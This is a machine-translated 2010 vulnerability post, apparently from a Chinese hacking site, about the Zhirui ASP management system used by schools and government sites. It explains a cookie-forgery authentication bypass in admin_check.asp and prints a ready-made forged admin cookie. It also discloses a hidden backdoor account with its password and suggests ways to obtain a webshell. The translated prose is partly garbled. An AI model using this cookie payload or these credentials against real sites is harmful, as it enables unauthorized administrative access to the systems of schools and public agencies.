Smart core management system through the kill vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201027708
Type myhack58
Reporter 佚名
Modified 2010-07-28T00:00:00


Smart core management system of the pass to kill the loopholes, a few days ago happen to need to get a Chi Rui school management system Station download the intelligent core of the system see the following code, found in the ADMIN directory, the admin_check. asp file code is written this way is by using COOKIES to transfer values to the SESSION so that you can forge COOKIES were deceived into the admin directory, in addition been found that this system the Database Management table, there's a smart core to leave the management of the account, manage the list of files through a simple encryption and decryption after the Find administrator account list file of the call display ID>1 The accounts, it can be seen that ID=1, account is Chi Rui to leave a small back door. By download the official corporate website system, The Government website system, Public Security Information Management Systems found that these systems can be through COOKIES deceived into the background, and has a hidden account.

COOKIES: ZhiRui=Check=ZhiRuiSystem&AdminPurview=%7C111%2C%7C112%2C%7C113%2C%7C114%2C%7C115%2C%7C116%2C%7C117%2C%7C118%2C%7C119%2C%7C121%2C%7C122%2C%7C211%2C%7C212%2C%7C311%2C%7C312%2C%7C313%2C%7C314%2C%7C511%2C%7C512%2C%7C513%2C%7C514%2C%7C611%2C%7C612%2C%7C711%2C%7C712%2C%7C713%2C%7C714% 2C%7C411%2C%7C412%2C%7C413%2C%7C414%2C%7C415%2C%7C811%2C%7C812%2C%7C813%2C%7C814%2C%7C815%2C%7C911%2C&ZhiRuiUser=%C4%DA%B2%BF%B5%F7%CA%D4&ZhiRuiAdmin=zhirui

Background temporarily haven't found the Get WEBSHELL method, there is a version with FCK editor by editor to get WEBSHELL, the background of the file Manager can traverse the directory, I found these available places, please correct me

The hidden account is zhirui:1 2 3 4 5 6

<% if trim(request. cookies("ZhiRui")("ZhiRuiAdmin"))<>"" then session("ZhiRuiAdmin")=request. cookies("ZhiRui")("ZhiRuiAdmin") session("ZhiRuiUser")=request. cookies("ZhiRui")("ZhiRuiUser") session("AdminPurview")=request. cookies("ZhiRui")("AdminPurview") End if If trim(session("ZhiRuiAdmin"))="" then Response. Write("<script language=javascript>alert('your cache time has been to or is empty, please return to re-login!'); this. top. location. href='Admin_Login. asp';</script>") Response. end End if If Request. Cookies("ZhiRui")("Check")<>"ZhiRuiSystem" then Response. Write("<script language=javascript>alert('your core authentication code error, please return to re-login!'); this. top. location. href='Admin_Login. asp';</script>") Response. end End if %>